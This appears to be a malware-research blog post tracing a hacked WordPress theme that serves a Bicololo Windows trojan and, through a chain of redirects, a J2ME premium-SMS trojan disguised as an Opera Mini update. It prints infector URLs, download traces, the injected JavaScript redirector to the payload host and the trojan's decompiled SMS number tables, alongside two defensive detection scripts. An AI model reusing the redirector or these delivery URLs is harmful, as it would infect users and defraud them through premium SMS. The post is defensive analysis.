Here we go!
Recognizing the infection pattern reported in urlQuery below: #MalwareMustDie
http://urlquery.net/report.php?id=678590
led us to a large number (hundreds) of malware infector URLs on a single host, differing only in the random ncrnd= token:
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=YQfpcUvsYV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xvGoLsqGhV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xxuMdywDDk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=VMmujweIUQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=uxsBosuiCw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=TxtyywoBdy
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=UImqwXIMoh
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=tEeWvHTtYn
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=RfkOKspdvC
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=qwBQIWUwOM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pPNhxcgVJk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pIYmBHGgee
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pBhEkPUQqf
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=OHRLfRUvGK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=nvDLJcwTuQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=msvIMqjIdB
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=Luncwlsxkw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LvGpxhVGuS
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lVlRWCfJvd
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lLcsskMdbK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LprlKrYScJ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=kqbeUHWYWb
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KqqjBhNpeM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LFGtIvwBnQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KpOuJWkLhY
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KfObcIdoVm
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=IkxUNXUHeP
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HYxgeMlwsp
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=hlwfpHMCMM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HcOGfViMqN
:
:
It is a compromised WordPress site running the "Stroy/Red Stroy" theme, with a fake "akismeet.php" script (named to look like the Akismet anti-spam plugin) injected into the theme directory; every randomly-tokenised request to it is bounced to the malware download. We think the theme was made in Russia.

The PC Threat
Shortly after, we fetched the sample:
Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74
Caching inbuildhouse.ru => 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected.
:
GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Found
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:02 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
:
302 Found
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following]
Skipping 0 bytes of body: [] done.
--20:46:10-- h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
=> `update.php@q=PHOTO-DEVOCHKA'
Reusing existing connection to inbuildhouse.ru:80.
:
GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:03 GMT
Content-Type: application/octet-stream
Content-Length: 184243
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Accept-Ranges: bytes
Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe"
:
200 OK
Length: 184,243 (180K) [application/octet-stream]
20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]
Note the two-stage delivery: akismeet.php answers the random ncrnd= request with a 302 to update.php?q=NAME, and update.php then serves the Win32 binary as an attachment named after the q= value (here PHOTO-DEVOCHKA.exe). The sample turned out to be a Win32 trojan of the Bicololo family (detected as VBS:Bicololo-BG by several vendors). Below is the VirusTotal scan result:
SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02
MD5: f54715875c3327953965072927e86bd0
File size: 179.9 KB ( 184243 bytes )
File name: GOLAYA-BABE.exe
File type: Win32 EXE
Tags: peexe bobsoft
Detection ratio: 11 / 44
Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago )
URL --->>[VirusTotal]
(VirusTotal shows the name the file was first submitted under, GOLAYA-BABE.exe; our copy was served as PHOTO-DEVOCHKA.exe with the same hash, consistent with update.php naming one and the same binary after whatever q= value is requested.)
Malware Names:
GData : VBS:Bicololo-BG
TrendMicro-HouseCall : TROJ_GEN.F47V0111
Avast : VBS:Bicololo-BG [Trj]
Kaspersky : UDS:DangerousObject.Multi.Generic
Jiangmin : Trojan/StartPage.bim
Malwarebytes : Trojan.StartPage.ooo
Panda : Trj/Qhost.MR
Ikarus : Trojan.Win32.Qhosts
Kingsoft : Win32.Troj.Undef.(kcloud)
TheHacker : Trojan/Bicololo.a
Microsoft : Trojan:Win32/QHosts.BF
The Qhost/QHosts and StartPage detection names point at hosts-file and browser start-page hijacking. VirusTotal and ESET have published a good description and analysis of this trojan. Our analysis result -->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured:
[network traffic capture image]
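As an added example (not MalwareMustDie's own tooling), the script below detects the two-stage chain shown above in a captured HTTP transcript and collapses the hundreds of per-visit akismeet.php?ncrnd= URLs into a single indicator. It also flags the JAR delivery from ktozdesj.ru/getfile.php described in the mobile section later in this post. The transcript format it parses (request line, request headers, status line, response headers) and the path regexes are assumptions generalised from the captures on this page; the sample transcript is constructed, with h00p written back as http so it parses.

```python
"""Offline detector for the akismeet.php -> update.php -> attachment chain.
Added example, not the blog's code.  Assumptions: a wget-style transcript of
request/response headers (format below) and path patterns taken from this post."""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed path patterns, generalised from the URLs reported in the post.
LURE_RE = re.compile(r"/wp-content/themes/[^/]+/akismeet\.php$")
DROPPER_RE = re.compile(r"/wp-content/themes/[^/]+/update\.php$")
BINARY_TYPES = {"application/octet-stream", "application/java-archive", "application/x-msdownload"}
ATTACH_RE = re.compile(r'filename="?([^";]+)"?', re.I)
METHODS = ("GET ", "POST ", "HEAD ")

# Constructed transcript mirroring the captures in this post (not a real pcap).
SAMPLE_TRANSCRIPT = """\
GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0
Host: inbuildhouse.ru

HTTP/1.1 302 Found
Server: nginx/1.1.5
Content-Type: text/html
Content-Length: 0
Location: http://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA

GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0
Host: inbuildhouse.ru

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 184243
Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe"

GET /wp-content/themes/stroy/style.css HTTP/1.0
Host: inbuildhouse.ru

HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 4096

GET /getfile.php?dtype=browser&r=9578-1&a=32 HTTP/1.0
Host: ktozdesj.ru

HTTP/1.1 200 OK
Content-Type: application/java-archive
Content-Length: 251481
Content-Disposition: attachment; filename="browser_update_install.jar"
"""


def parse_transcript(text):
    """Split the transcript into transactions: a request line starts one, a
    status line switches to the response side, 'Key: value' lines are headers."""
    txns, cur, side = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(METHODS):
            cur = {"path": line.split()[1], "req": {}, "status": None, "resp": {}}
            txns.append(cur)
            side = "req"
        elif line.startswith("HTTP/") and cur is not None:
            cur["status"] = int(line.split()[1])
            side = "resp"
        elif ":" in line and cur is not None:
            key, value = line.split(":", 1)
            cur[side][key.strip().lower()] = value.strip()
    for t in txns:
        t["url"] = "http://" + t["req"].get("host", "") + t["path"]
    return txns


def analyse_chain(txns):
    """Return (stage, url, detail) findings in chain order."""
    findings, expected_name = [], None
    for t in txns:
        parts = urlsplit(t["url"])
        qs = parse_qs(parts.query)
        if LURE_RE.search(parts.path):
            loc = t["resp"].get("location", "")
            tok = qs.get("ncrnd", [""])[0]
            findings.append(("lure", t["url"], f"ncrnd={tok} status={t['status']} -> {loc}"))
            if t["status"] in (301, 302) and DROPPER_RE.search(urlsplit(loc).path):
                expected_name = parse_qs(urlsplit(loc).query).get("q", [""])[0]
        ctype = t["resp"].get("content-type", "").split(";")[0].strip().lower()
        m = ATTACH_RE.search(t["resp"].get("content-disposition", ""))
        if t["status"] == 200 and ctype in BINARY_TYPES and m:
            fname = m.group(1)
            detail = f"attachment {fname} ({ctype}, {t['resp'].get('content-length', '?')} bytes)"
            if expected_name and fname.lower().startswith(expected_name.lower()):
                detail += f"; filename derived from q={expected_name}"
            findings.append(("payload", t["url"], detail))
    return findings


def canonical_lure(url):
    """Drop the per-visit ncrnd token so hundreds of reported URLs become one IOC."""
    p = urlsplit(url)
    q = {k: v for k, v in parse_qs(p.query).items() if k != "ncrnd"}
    return p._replace(query=urlencode(q, doseq=True)).geturl()


if __name__ == "__main__":
    for stage, url, detail in analyse_chain(parse_transcript(SAMPLE_TRANSCRIPT)):
        print(f"[{stage}] {url}: {detail}")
```

The benign style.css request produces no finding, and the same code flags the JAR served by ktozdesj.ru because the check keys on "200 + binary MIME type + attachment", not on the file name.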
The Mobile Threat
The story is not over yet; the hacked site was filled with other infectors. We accidentally found this link:
inbuildhouse.ru/wp-content/themes/stroy/
Then we followed it...
=> `inbuildhouse.ru/wp-content/themes/stroy/index.html'
Resolving inbuildhouse.ru... 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: h00p://mampoks.ru [following]
--20:59:13-- h00p://mampoks.ru/
=> `mampoks.ru/index.html'
Resolving mampoks.ru... 195.128.18.244
Connecting to mampoks.ru|195.128.18.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/html]
20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]
...and were forwarded to ANOTHER infector (mampoks.ru). We downloaded that infector's index.html instead, which contains a redirector to yet ANOTHER host's landing page at ktozdesj.ru (a JavaScript location.replace() with a <noscript> meta-refresh fallback, so the redirect also works with scripting disabled):
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">
Your browser will download:
Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130
Caching ktozdesj.ru => 93.170.107.130
Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected.
GET /l.php?l=o&r=9578&a=32 HTTP/1.0
Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: ktozdesj.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:01:13 GMT
Content-Type: text/html
Content-Length: 5307
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri, 11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost
200 OK
Length: 5,307 (5.2K) [text/html]
21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]
The landing page (a fake "Opera Mini update" page in Russian) carries the malicious link below; the r= and a= values from the redirect are carried through, apparently as affiliate/campaign identifiers:
ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32
PoC:
$ grep "getfile" l.php
l.php(24): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="Обновление Opera Mini"></a>
l.php(35): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link">
l.php(66): <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close">
l.php(80): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">СКАЧАТЬ версию 7.0</a></p>
l.php(84): <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="Обнови свою Opera!" target="_blank">
l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">СКАЧАТЬ версию 7.0</a></p>
(The Russian strings, mis-encoded in the original capture, read "Opera Mini update", "DOWNLOAD version 7.0" and "Update your Opera!".)
If your browser is a mobile/Android one you will be redirected to that URL. And where does it lead us?
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:14:09 GMT
Content-Type: application/java-archive
Content-Length: 251481
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost
Content-Disposition: attachment; filename="browser_update_install.jar"
Yes, another JAR payload: "browser_update_install.jar" (a Java ME MIDlet package, as most of the detection names below confirm).
File Info:
browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8
We analysed the code and found its malicious SMS-sending functions -->>[HERE]. Yes, it sends SMS to specific hard-coded numbers, and it carries tables of mobile operator prefixes and international country codes, presumably to choose the destination number matching the victim's country and operator. Some of the numbers to reach (decompiler output; the `{ ... }[n] = "..."` form is a decompiler artifact and simply denotes an array whose element n is the trailing value):
public final class k {
  private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" };
  private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" };
  private static String[] c = { "7922", "7929", "7932" };
  :
  :
  static {{ "79037011111", "73339077000", "77059077000", "790173100", 
"79033619502" }[5] = "79037011110"; { "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263"; d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" }; e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", 
"7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", "790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", 
"795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", "790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", 
"790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", "795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" };
  { "38050", "38095", "38066" }[3] = "38099";
  { "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023";
  f = new String[] { "7705", "7777", "7771" };
  }
}
Some country codes (the class also keeps hashtables mapping international dialling codes to country labels):
jdField_a_of_type_JavaUtilHashtable.put("7840", "ab");
jdField_a_of_type_JavaUtilHashtable.put("7940", "ab");
jdField_b_of_type_JavaUtilHashtable.put("994", "az");
jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir");
jdField_b_of_type_JavaUtilHashtable.put("374", "am");
jdField_b_of_type_JavaUtilHashtable.put("375", "by");
jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria");
jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc");
jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala");
jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras");
jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong");
jdField_b_of_type_JavaUtilHashtable.put("972", "israel");
jdField_b_of_type_JavaUtilHashtable.put("962", "iordania");
jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");
(The labels are Russian transliterations of country names: alzhir = Algeria, bolgaria = Bulgaria, bosniaigerc = Bosnia and Herzegovina, gvatemala = Guatemala, gonduras = Honduras, gonkong = Hong Kong, iordania = Jordan, kambodzha = Cambodia; the 7840/7940 "ab" entries are Abkhazia.)
VirusTotal check shows:
MD5: 45078333eb39116c154899d3bf5501e8
File size: 245.6 KB ( 251481 bytes )
File name: browser_update_install.jar
File type: JAR
Tags: jar
Detection ratio: 31 / 46
Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago )
URL --->>[VirusTotal]
Malware Names:
MicroWorld-eScan : Trojan.Java.Smssend.W
nProtect : Trojan.Java.Smssend.W
CAT-QuickHeal : Trojan.JavaExploit
McAfee : Generic.dx!bfzk
K7AntiVirus : Trojan
F-Prot : Java/SMSer.L
Symantec : Trojan.Gen.2
Norman : SMSSend.CX
TotalDefense : Java/SMSTroj.Q
TrendMicro-HouseCall : TROJ_GEN.FCBHZIK
Avast : Java:SMSSend-GF [Expl]
ClamAV : Android.Trojan.Smssend-7
Kaspersky : Trojan-SMS.J2ME.Jifake.my
BitDefender : Trojan.Java.Smssend.W
NANO-Antivirus : Trojan.SmsSend.wgugf
Sophos : Troj/Jifake-A
Comodo : UnclassifiedMalware
F-Secure : Trojan.Java.Smssend.W
DrWeb : Java.SMSSend.780
AntiVir : JAVA/Badorg.BA
TrendMicro : JAVA_SMSAGE.NT
Emsisoft : Trojan.Java.Smssend.W (B)
Jiangmin : Trojan/AndroidOS.afcr
Microsoft : Trojan:Java/SMSer.AY
ViRobot : J2ME.A.Jifake.2840
GData : Trojan.Java.Smssend.W
Commtouch : Java/SMSer.L
ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH
Ikarus : JAVA.SMSSend
Fortinet : Java/SMSBoxer.AQ!tr
AVG : Java/SMS.OO

Research Materials
To fellow researchers and the AV industry: samples and analysis data are -->>[HERE]
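As a closing added example (not the post's own tooling), here is an offline triage script for Java ME packages like browser_update_install.jar. It looks for the two signals a J2ME SMS trojan almost always carries: a MIDlet-Permissions attribute requesting javax.wireless.messaging.sms.send, and constant-pool references to the javax/wireless/messaging API alongside numeric string literals (destination numbers and operator prefixes). The constant-pool walker and the sample JAR are written for this example; the sample is constructed in memory (a manifest plus a header-and-constant-pool-only class file, not the real sample), and its numbers are taken from the decompiled arrays shown in the post.

```python
"""Triage a MIDlet JAR for SMS-sending capability and embedded numbers, offline.
Added example, not MalwareMustDie's code.  Assumptions: the JAR carries a
META-INF/MANIFEST.MF and standard .class files; the sample below is constructed."""
import io
import re
import struct
import zipfile

SMS_PERMISSION = "javax.wireless.messaging.sms.send"   # WMA permission for sending SMS
WMA_API = "javax/wireless/messaging/"                   # MessageConnection & co.
NUMBER_RE = re.compile(r"^\+?\d{4,15}$")

# Constant-pool tag -> fixed payload size; tag 1 (Utf8) is variable length.
_CP_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
             12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_utf8_constants(data):
    """Return every CONSTANT_Utf8 string in a .class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            pos += 2
            out.append(data[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        elif tag in _CP_FIXED:
            pos += _CP_FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag}")
        idx += 2 if tag in (5, 6) else 1   # Long and Double occupy two slots
    return out


def manifest_permissions(manifest):
    """Parse MIDlet-Permissions (comma-separated; continuation lines start with a space)."""
    joined = manifest.replace("\r\n", "\n").replace("\n ", "")
    for line in joined.split("\n"):
        key, _, value = line.partition(":")
        if key.strip() == "MIDlet-Permissions":
            return [p.strip() for p in value.split(",") if p.strip()]
    return []


def triage_midlet(jar_bytes):
    """Report SMS permission, WMA API use and numeric literals found in the JAR."""
    result = {"sms_permission": False, "wma_api": False, "numbers": set()}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        if "META-INF/MANIFEST.MF" in names:
            perms = manifest_permissions(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
            result["sms_permission"] = SMS_PERMISSION in perms
        for name in names:
            if name.endswith(".class"):
                for s in class_utf8_constants(zf.read(name)):
                    if s.startswith(WMA_API):
                        result["wma_api"] = True
                    elif NUMBER_RE.match(s):
                        result["numbers"].add(s)
    result["numbers"] = sorted(result["numbers"])
    # API use plus either the declared permission or a batch of numbers is the trojan pattern.
    result["suspicious"] = result["wma_api"] and (result["sms_permission"] or len(result["numbers"]) >= 3)
    return result


def _class_with_constants(strings):
    """Constructed .class: header + constant pool only (Utf8 entries, one Class, one Long)."""
    pool = b"".join(b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in strings)
    pool += b"\x07" + struct.pack(">H", 1)          # CONSTANT_Class -> #1
    pool += b"\x05" + struct.pack(">Q", 0)          # CONSTANT_Long, takes two slots
    count = len(strings) + 1 + 2 + 1
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 48, count) + pool


def build_sample_jar():
    """Constructed MIDlet modelled on browser_update_install.jar (numbers from the post)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nMIDlet-Name: Opera Mini Update\r\n"
                    "MIDlet-Permissions: javax.microedition.io.Connector.sms,\r\n"
                    " javax.wireless.messaging.sms.send\r\n")
        zf.writestr("k.class", _class_with_constants(
            ["javax/wireless/messaging/MessageConnection", "sms://",
             "79202909090", "79206909090", "7922"]))
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_midlet(build_sample_jar()))
```

Caveat: MIDlet-Permissions may sit in the .jad descriptor rather than the manifest, and an unsigned MIDlet still prompts the user on many handsets, so a missing permission is not a clean bill of health; the API reference plus a block of numeric literals is the stronger signal.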